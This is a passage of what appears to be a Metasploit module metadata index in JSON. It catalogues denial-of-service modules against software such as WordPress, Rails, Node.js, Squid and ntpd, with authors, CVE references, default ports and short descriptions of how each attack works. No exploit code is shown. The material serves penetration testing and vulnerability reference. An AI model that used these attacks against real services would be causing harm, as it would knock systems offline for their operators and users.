"autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb", - "is_install_path": true, - "ref_name": "dos/http/ibm_lotus_notes2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/http/marked_redos": { - "name": "marked npm module \"heading\" ReDoS", - "fullname": "auxiliary/dos/http/marked_redos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Adam Cazzolla, Sonatype Security Research", - "Nick Starke, Sonatype Security Research" - ], - "description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.", - "references": [ - "URL-https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not", - "CWE-400" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2018-08-16 14:59:32 +0000", - "path": "/modules/auxiliary/dos/http/marked_redos.rb", - "is_install_path": true, - "ref_name": "dos/http/marked_redos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/metasploit_httphandler_dos": { - "name": "Metasploit HTTP(S) handler DoS", - "fullname": "auxiliary/dos/http/metasploit_httphandler_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-09-04", - "type": "auxiliary", - "author": [ - "Jose Garduno, Dreamlab Technologies AG", - "Angelo Seiler, Dreamlab Technologies AG" - ], - "description": "This module exploits the Metasploit HTTP(S) handler by sending\n a specially crafted HTTP request that gets added as a resource handler.\n Resources (which come from the external connections) are evaluated as RegEx\n in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n Tested against Metasploit 5.0.20.", - "references": [ - "CVE-2019-5645" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2019-12-26 13:31:38 +0000", - "path": "/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/metasploit_httphandler_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/monkey_headers": { - "name": "Monkey HTTPD Header Parsing Denial of Service (DoS)", - "fullname": "auxiliary/dos/http/monkey_headers", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-30", - "type": "auxiliary", - "author": [ - "Doug Prostko " - ], - "description": "This module causes improper header parsing that leads to a segmentation fault\n due to a specially crafted HTTP request. Affects version <= 1.2.0.", - "references": [ - "CVE-2013-3843", - "OSVDB-93853", - "BID-60333" - ], - "platform": "", - "arch": "", - "rport": 2001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/monkey_headers.rb", - "is_install_path": true, - "ref_name": "dos/http/monkey_headers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/ms15_034_ulonglongadd": { - "name": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service", - "fullname": "auxiliary/dos/http/ms15_034_ulonglongadd", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Bill Finlayson", - "sinn3r " - ], - "description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. This module will try to cause a denial-of-service.", - "references": [ - "CVE-2015-1635", - "MSB-MS15-034", - "URL-https://pastebin.com/ypURDPc4", - "URL-https://github.com/rapid7/metasploit-framework/pull/5150", - "URL-https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection", - "URL-http://www.securitysift.com/an-analysis-of-ms15-034/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb", - "is_install_path": true, - "ref_name": "dos/http/ms15_034_ulonglongadd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/nodejs_pipelining": { - "name": "Node.js HTTP Pipelining Denial of Service", - "fullname": "auxiliary/dos/http/nodejs_pipelining", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-18", - "type": "auxiliary", - "author": [ - "Marek Majkowski", - "titanous", - "joev " - ], - "description": "This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions\n released before 0.10.21 and 0.8.26. The attack sends many pipelined\n HTTP requests on a single connection, which causes unbounded memory\n allocation when the client does not read the responses.", - "references": [ - "CVE-2013-4450", - "OSVDB-98724", - "BID-63229", - "URL-https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb", - "is_install_path": true, - "ref_name": "dos/http/nodejs_pipelining", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/novell_file_reporter_heap_bof": { - "name": "NFR Agent Heap Overflow Vulnerability", - "fullname": "auxiliary/dos/http/novell_file_reporter_heap_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-16", - "type": "auxiliary", - "author": [ - "juan vazquez " - ], - "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n where NFRAgent.exe fails to generate a response in a secure way, copying user\n controlled data into a fixed-length buffer in the heap without bounds checking.\n This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).", - "references": [ - "CVE-2012-4956", - "URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/" - ], - "platform": "", - "arch": "", - "rport": 3037, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb", - "is_install_path": true, - "ref_name": "dos/http/novell_file_reporter_heap_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/rails_action_view": { - "name": "Ruby on Rails Action View MIME Memory Exhaustion", - "fullname": "auxiliary/dos/http/rails_action_view", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-04", - "type": "auxiliary", - "author": [ - "Toby Hsieh", - "joev ", - "sinn3r " - ], - "description": "This module exploits a Denial of Service (DoS) condition in Action View that requires\n a controller action. By sending a specially crafted content-type header to a Rails\n application, it is possible for it to store the invalid MIME type, and may eventually\n consume all memory if enough invalid MIMEs are given.\n\n Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.", - "references": [ - "CVE-2013-6414", - "OSVDB-100525", - "BID-64074", - "URL-https://seclists.org/oss-sec/2013/q4/400", - "URL-https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/rails_action_view.rb", - "is_install_path": true, - "ref_name": "dos/http/rails_action_view", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/rails_json_float_dos": { - "name": "Ruby on Rails JSON Processor Floating Point Heap Overflow DoS", - "fullname": "auxiliary/dos/http/rails_json_float_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-22", - "type": "auxiliary", - "author": [ - "Charlie Somerville", - "joev ", - "todb " - ], - "description": "When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. Other versions of Ruby are reported to be affected.", - "references": [ - "CVE-2013-4164", - "OSVDB-100113", - "URL-https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/rails_json_float_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/slowloris": { - "name": "Slowloris Denial of Service Attack", - "fullname": "auxiliary/dos/http/slowloris", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-06-17", - "type": "auxiliary", - "author": [ - "RSnake", - "Gokberk Yaltirakli", - "Daniel Teixeira", - "Matthew Kienow " - ], - "description": "Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.\n It accomplishes this by opening connections to the target web server and sending a partial request.\n Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.\n Affected servers will keep these connections open, filling their maximum concurrent connection pool,\n eventually denying additional connection attempts from clients.", - "references": [ - "CVE-2007-6750", - "CVE-2010-2227", - "EDB-8976", - "URL-https://github.com/gkbrk/slowloris" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-29 00:51:56 +0000", - "path": "/modules/auxiliary/dos/http/slowloris.py", - "is_install_path": true, - "ref_name": "dos/http/slowloris", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/sonicwall_ssl_format": { - "name": "SonicWALL SSL-VPN Format String Vulnerability", - "fullname": "auxiliary/dos/http/sonicwall_ssl_format", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-05-29", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "There is a format string vulnerability within the SonicWALL\n SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory\n can be read or written to, depending on the format string used.\n There appears to be a length limit of 127 characters of format\n string data. With physical access to the device and debugging,\n this module may be able to be used to execute arbitrary code remotely.", - "references": [ - "BID-35145", - "OSVDB-54881", - "URL-http://www.aushack.com/200905-sonicwall.txt" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb", - "is_install_path": true, - "ref_name": "dos/http/sonicwall_ssl_format", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/squid_range_dos": { - "name": "Squid Proxy Range Header DoS", - "fullname": "auxiliary/dos/http/squid_range_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-05-27", - "type": "auxiliary", - "author": [ - "Joshua Rogers" - ], - "description": "The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and\n 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered\n by specific HTTP requests and responses.\n\n These vulnerabilities allow remote attackers to cause a\n denial of service through specifically crafted requests.", - "references": [ - "CVE-2021-31806", - "CVE-2021-31807", - "URL-https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/" - ], - "platform": "", - "arch": "", - "rport": 3128, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2021-10-21 19:15:30 +0000", - "path": "/modules/auxiliary/dos/http/squid_range_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/squid_range_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "DOS", - "description": "Perform Denial of Service Against The Target" - } - ] - }, - "auxiliary_dos/http/tautulli_shutdown_exec": { - "name": "Tautulli v2.1.9 - Shutdown Denial of Service", - "fullname": "auxiliary/dos/http/tautulli_shutdown_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ismail Tasdelen" - ], - "description": "Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.", - "references": [ - "CVE-2019-19833", - "EDB-47785" - ], - "platform": "", - "arch": "", - "rport": 8181, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb", - "is_install_path": true, - "ref_name": "dos/http/tautulli_shutdown_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/ua_parser_js_redos": { - "name": "ua-parser-js npm module ReDoS", - "fullname": "auxiliary/dos/http/ua_parser_js_redos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ryan Knell, Sonatype Security Research", - "Nick Starke, Sonatype Security Research" - ], - "description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"ua-parser-js\". Server-side applications that use\n \"ua-parser-js\" for parsing the browser user-agent string will be vulnerable\n if they call the \"getOS\" or \"getResult\" functions. This vulnerability was\n fixed as of version 0.7.16.", - "references": [ - "CVE-2017-16086", - "URL-https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79", - "CWE-400" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2018-07-12 17:34:52 +0000", - "path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb", - "is_install_path": true, - "ref_name": "dos/http/ua_parser_js_redos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/webkitplus": { - "name": "WebKitGTK+ WebKitFaviconDatabase DoS", - "fullname": "auxiliary/dos/http/webkitplus", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-06-03", - "type": "auxiliary", - "author": [ - "Dhiraj Mishra", - "Hardik Mehta", - "Zubin Devnani", - "Manuel Caballero" - ], - "description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.", - "references": [ - "EDB-44842", - "CVE-2018-11646", - "URL-https://bugs.webkit.org/show_bug.cgi?id=186164", - "URL-https://www.inputzero.io/2018/06/cve-2018-11646-webkit.html" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/webkitplus.rb", - "is_install_path": true, - "ref_name": "dos/http/webkitplus", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/http/webrick_regex": { - "name": "Ruby WEBrick::HTTP::DefaultFileHandler DoS", - "fullname": "auxiliary/dos/http/webrick_regex", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-08-08", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.", - "references": [ - "BID-30644", - "CVE-2008-3656", - "OSVDB-47471", - "URL-http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/webrick_regex.rb", - "is_install_path": true, - "ref_name": "dos/http/webrick_regex", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/wordpress_directory_traversal_dos": { - "name": "WordPress Traversal Directory DoS", - "fullname": "auxiliary/dos/http/wordpress_directory_traversal_dos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Yorick Koster", - "CryptisStudents" - ], - "description": "Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin\n function in wp-admin/includes/ajax-actions.php in WordPress before 4.6\n allows remote attackers to hijack the authentication of subscribers\n for /dev/random read operations by leveraging a late call to\n the check_ajax_referer function, a related issue to CVE-2016-6896.", - "references": [ - "CVE-2016-6897", - "EDB-40288", - "OVE-OVE-20160712-0036" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/wordpress_directory_traversal_dos", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/wordpress_long_password_dos": { - "name": "WordPress Long Password DoS", - "fullname": "auxiliary/dos/http/wordpress_long_password_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-20", - "type": "auxiliary", - "author": [ - "Javier Nieto Arevalo", - "Andres Rojas Guerrero", - "rastating" - ], - "description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.", - "references": [ - "CVE-2014-9016", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2014-9034", - "OSVDB-114857", - "WPVDB-7681" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/wordpress_long_password_dos", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/wordpress_xmlrpc_dos": { - "name": "Wordpress XMLRPC DoS", - "fullname": "auxiliary/dos/http/wordpress_xmlrpc_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-08-06", - "type": "auxiliary", - "author": [ - "Nir Goldshlager", - "Christian Mehlmauer " - ], - "description": "Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.\n This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are\n also patched).", - "references": [ - "CVE-2014-5266", - "URL-https://wordpress.org/news/2014/08/wordpress-3-9-2/", - "URL-http://www.breaksec.com/?p=6362", - "URL-https://mashable.com/archive/wordpress-xml-blowup-dos", - "URL-https://core.trac.wordpress.org/changeset/29404", - "WPVDB-7526" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/wordpress_xmlrpc_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/ws_dos": { - "name": "ws - Denial of Service", - "fullname": "auxiliary/dos/http/ws_dos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Ryan Knell, Sonatype Security Research", - "Nick Starke, Sonatype Security Research" - ], - "description": "This module exploits a Denial of Service vulnerability in npm module \"ws\".\n By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.", - "references": [ - "URL-https://nodesecurity.io/advisories/550", - "CWE-400" - ], - "platform": "", - "arch": "", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/http/ws_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/ws_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/mdns/avahi_portzero": { - "name": "Avahi Source Port 0 DoS", - "fullname": "auxiliary/dos/mdns/avahi_portzero", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-11-14", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "Avahi-daemon versions prior to 0.6.24 can be DoS'd\n with an mDNS packet with a source port of 0.", - "references": [ - "CVE-2008-5081", - "OSVDB-50929" - ], - "platform": "", - "arch": "", - "rport": 5353, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb", - "is_install_path": true, - "ref_name": "dos/mdns/avahi_portzero", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/mirageos/qubes_mirage_firewall_dos": { - "name": "Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit", - "fullname": "auxiliary/dos/mirageos/qubes_mirage_firewall_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-12-04", - "type": "auxiliary", - "author": [ - "Krzysztof Burghardt " - ], - "description": "This module allows remote attackers to cause a denial of service (DoS)\n in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.", - "references": [ - "CVE-2022-46770", - "URL-https://mirage.io/blog/MSA03", - "URL-https://github.com/mirage/qubes-mirage-firewall/issues/166" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-05 12:04:59 +0000", - "path": "/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb", - "is_install_path": true, - "ref_name": "dos/mirageos/qubes_mirage_firewall_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/misc/dopewars": { - "name": "Dopewars Denial of Service", - "fullname": "auxiliary/dos/misc/dopewars", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-10-05", - "type": "auxiliary", - "author": [ - "Doug Prostko " - ], - "description": "The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to\n a lack of input validation.", - "references": [ - "CVE-2009-3591", - "OSVDB-58884", - "BID-36606" - ], - "platform": "", - "arch": "", - "rport": 7902, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/misc/dopewars.rb", - "is_install_path": true, - "ref_name": "dos/misc/dopewars", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/misc/ibm_sametime_webplayer_dos": { - "name": "IBM Lotus Sametime WebPlayer DoS", - "fullname": "auxiliary/dos/misc/ibm_sametime_webplayer_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-07", - "type": "auxiliary", - "author": [ - "Chris John Riley", - "kicks4kittens" - ], - "description": "This module exploits a known flaw in the IBM Lotus Sametime WebPlayer\n version 8.5.2.1392 (and prior) to cause a denial of service condition\n against specific users. For this module to function the target user\n must be actively logged into the IBM Lotus Sametime server and have\n the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a\n browser extension. The user should have the WebPlayer plug-in active\n (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.", - "references": [ - "CVE-2013-3986", - "OSVDB-99552", - "BID-63611", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21654041", - "URL-http://xforce.iss.net/xforce/xfdb/84969" - ], - "platform": "", - "arch": "", - "rport": 5060, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb", - "is_install_path": true, - "ref_name": "dos/misc/ibm_sametime_webplayer_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "CHECK", - "description": "Checking if targeted user is online" - }, - { - "name": "DOS", - "description": "Cause a Denial Of Service condition against a connected user" - } - ] - }, - "auxiliary_dos/misc/ibm_tsm_dos": { - "name": "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", - "fullname": "auxiliary/dos/misc/ibm_tsm_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-12-15", - "type": "auxiliary", - "author": [ - "Gianni Gnesa", - "William Webb " - ], - "description": "This module exploits a denial of service condition present in IBM Tivoli Storage Manager\n FastBack Server when dealing with packets triggering the opcode 0x534 handler.", - "references": [ - "EDB-38979", - "OSVDB-132307" - ], - "platform": "", - "arch": "", - "rport": 11460, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb", - "is_install_path": true, - "ref_name": "dos/misc/ibm_tsm_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/misc/memcached": { - "name": "Memcached Remote Denial of Service", - "fullname": "auxiliary/dos/misc/memcached", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Gregory Man " - ], - "description": "This module sends a specially-crafted packet to cause a\n segmentation fault in memcached v1.4.15 or earlier versions.", - "references": [ - "URL-https://code.google.com/archive/p/memcached/issues/192", - "CVE-2011-4971", - "OSVDB-92867" - ], - "platform": "", - "arch": "", - "rport": 11211, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/misc/memcached.rb", - "is_install_path": true, - "ref_name": "dos/misc/memcached", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ntp/ntpd_reserved_dos": { - "name": "NTP.org ntpd Reserved Mode Denial of Service", - "fullname": "auxiliary/dos/ntp/ntpd_reserved_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-10-04", - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module exploits a denial of service vulnerability\n within the NTP (network time protocol) demon. By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!", - "references": [ - "BID-37255", - "CVE-2009-3563", - "OSVDB-60847", - "URL-https://bugs.ntp.org/show_bug.cgi?id=1331" - ], - "platform": "", - "arch": "", - "rport": null, - 